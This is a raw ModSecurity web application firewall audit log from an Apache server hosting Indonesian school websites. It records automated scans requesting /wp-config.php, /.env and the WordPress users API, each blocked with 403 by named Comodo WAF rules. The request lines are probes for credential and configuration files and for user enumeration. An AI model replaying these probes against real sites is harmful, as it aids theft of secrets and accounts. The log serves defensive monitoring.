Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad56c811-Z-- --24a38036-A-- [11/Jun/2025:00:03:02 +0700] aEhlRmQJEkWdvAT5oU7EswAAAAU 103.236.140.4 51534 103.236.140.4 8181 --24a38036-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.116.105.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.116.105.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --24a38036-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24a38036-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749574982296332 3529 (- - -) Stopwatch2: 1749574982296332 3529; combined=2021, p1=707, p2=1277, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24a38036-Z-- --1c14914b-A-- [11/Jun/2025:00:09:55 +0700] aEhm42QJEkWdvAT5oU7RFAAAAAo 103.236.140.4 45040 103.236.140.4 8181 --1c14914b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.252.238.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.252.238.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c14914b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c14914b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749575395271385 26151 (- - -) Stopwatch2: 1749575395271385 26151; combined=2816, p1=1096, p2=1674, p3=0, p4=0, p5=46, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c14914b-Z-- --df562e00-A-- [11/Jun/2025:00:53:49 +0700] aEhxLTQZgo88hy0TiYxtIQAAAEc 103.236.140.4 51876 103.236.140.4 8181 --df562e00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.239.136.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.239.136.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df562e00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df562e00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749578029621063 2260 (- - -) Stopwatch2: 1749578029621063 2260; combined=1189, p1=394, p2=763, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df562e00-Z-- --da7acf28-A-- [11/Jun/2025:01:07:07 +0700] aEh0SzQZgo88hy0TiYyBTgAAAEY 103.236.140.4 58214 103.236.140.4 8181 --da7acf28-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.223.84.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --da7acf28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da7acf28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749578827517449 834 (- - -) Stopwatch2: 1749578827517449 834; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da7acf28-Z-- --326a5468-A-- [11/Jun/2025:01:07:07 +0700] aEh0SzQZgo88hy0TiYyBUAAAAEw 103.236.140.4 58220 103.236.140.4 8181 --326a5468-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.223.84.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --326a5468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --326a5468-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749578827553108 733 (- - -) Stopwatch2: 1749578827553108 733; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --326a5468-Z-- --63429c13-A-- [11/Jun/2025:01:10:11 +0700] aEh1AzQZgo88hy0TiYyF3AAAAFU 103.236.140.4 52732 103.236.140.4 8181 --63429c13-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 159.223.84.236 Accept-Encoding: gzip X-Varnish: 177787364 --63429c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --63429c13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579011461241 751 (- - -) Stopwatch2: 1749579011461241 751; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63429c13-Z-- --3cd61f66-A-- [11/Jun/2025:01:10:11 +0700] aEh1A2kffiosQXBbxVaw3gAAAMk 103.236.140.4 52740 103.236.140.4 8181 --3cd61f66-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 159.223.84.236 Accept-Encoding: gzip X-Varnish: 177787367 --3cd61f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3cd61f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579011482505 692 (- - -) Stopwatch2: 1749579011482505 692; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cd61f66-Z-- --ce4f351b-A-- [11/Jun/2025:01:13:17 +0700] aEh1vWkffiosQXBbxVa43wAAAM0 103.236.140.4 41930 103.236.140.4 8181 --ce4f351b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) Accept-Charset: utf-8 --ce4f351b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce4f351b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579197936393 651 (- - -) Stopwatch2: 1749579197936393 651; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce4f351b-Z-- --ab6e753d-A-- [11/Jun/2025:01:32:39 +0700] aEh6R2QJEkWdvAT5oU4wHwAAAAk 103.236.140.4 34376 103.236.140.4 8181 --ab6e753d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.161.40.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.161.40.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab6e753d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6e753d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749580359495222 2630 (- - -) Stopwatch2: 1749580359495222 2630; combined=1300, p1=424, p2=844, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6e753d-Z-- --5c80d03d-A-- [11/Jun/2025:01:51:49 +0700] aEh-xWkffiosQXBbxVb0nAAAAMw 103.236.140.4 32944 103.236.140.4 8181 --5c80d03d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --5c80d03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c80d03d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581509838971 1052 (- - -) Stopwatch2: 1749581509838971 1052; combined=461, p1=387, p2=0, p3=0, p4=0, p5=74, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c80d03d-Z-- --02d8e355-A-- [11/Jun/2025:01:52:00 +0700] aEh-0DQZgo88hy0TiYyyLwAAAEo 103.236.140.4 34050 103.236.140.4 8181 --02d8e355-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --02d8e355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d8e355-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581520962629 879 (- - -) Stopwatch2: 1749581520962629 879; combined=324, p1=288, p2=0, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d8e355-Z-- --66207010-A-- [11/Jun/2025:01:52:54 +0700] aEh_BmkffiosQXBbxVb1_AAAAMs 103.236.140.4 39364 103.236.140.4 8181 --66207010-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Accept-Charset: utf-8 --66207010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66207010-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581574885627 907 (- - -) Stopwatch2: 1749581574885627 907; combined=315, p1=268, p2=0, p3=0, p4=0, p5=46, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66207010-Z-- --6f14a30a-A-- [11/Jun/2025:01:53:24 +0700] aEh_JGkffiosQXBbxVb2pwAAAMY 103.236.140.4 42162 103.236.140.4 8181 --6f14a30a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --6f14a30a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f14a30a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581604136718 645 (- - -) Stopwatch2: 1749581604136718 645; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f14a30a-Z-- --d6fc0e29-A-- [11/Jun/2025:03:15:27 +0700] aEiSX2QJEkWdvAT5oU6JYgAAABM 103.236.140.4 56610 103.236.140.4 8181 --d6fc0e29-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d6fc0e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6fc0e29-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749586527059404 922 (- - -) Stopwatch2: 1749586527059404 922; combined=335, p1=297, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6fc0e29-Z-- --fd790562-A-- [11/Jun/2025:03:35:33 +0700] aEiXFZKj8lJYHQZ0Enez6AAAAIM 103.236.140.4 44568 103.236.140.4 8181 --fd790562-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.102.151.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.102.151.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fd790562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd790562-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749587733824713 3053 (- - -) Stopwatch2: 1749587733824713 3053; combined=1251, p1=414, p2=809, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd790562-Z-- --1553c736-A-- [11/Jun/2025:04:17:46 +0700] aEig-pKj8lJYHQZ0Ene0XAAAAIE 103.236.140.4 45060 103.236.140.4 8181 --1553c736-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.143.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.143.227 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1553c736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1553c736-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749590266924724 841 (- - -) Stopwatch2: 1749590266924724 841; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1553c736-Z-- --2096c923-A-- [11/Jun/2025:04:35:43 +0700] aEilL5Kj8lJYHQZ0Ene0dwAAAJg 103.236.140.4 45226 103.236.140.4 8181 --2096c923-B-- GET /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --2096c923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2096c923-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749591343435103 911 (- - -) Stopwatch2: 1749591343435103 911; combined=404, p1=364, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2096c923-Z-- --681d9051-A-- [11/Jun/2025:04:57:39 +0700] aEiqU5Kj8lJYHQZ0Ene46gAAAJE 103.236.140.4 38908 103.236.140.4 8181 --681d9051-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --681d9051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --681d9051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749592659567515 747 (- - -) Stopwatch2: 1749592659567515 747; combined=328, p1=294, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
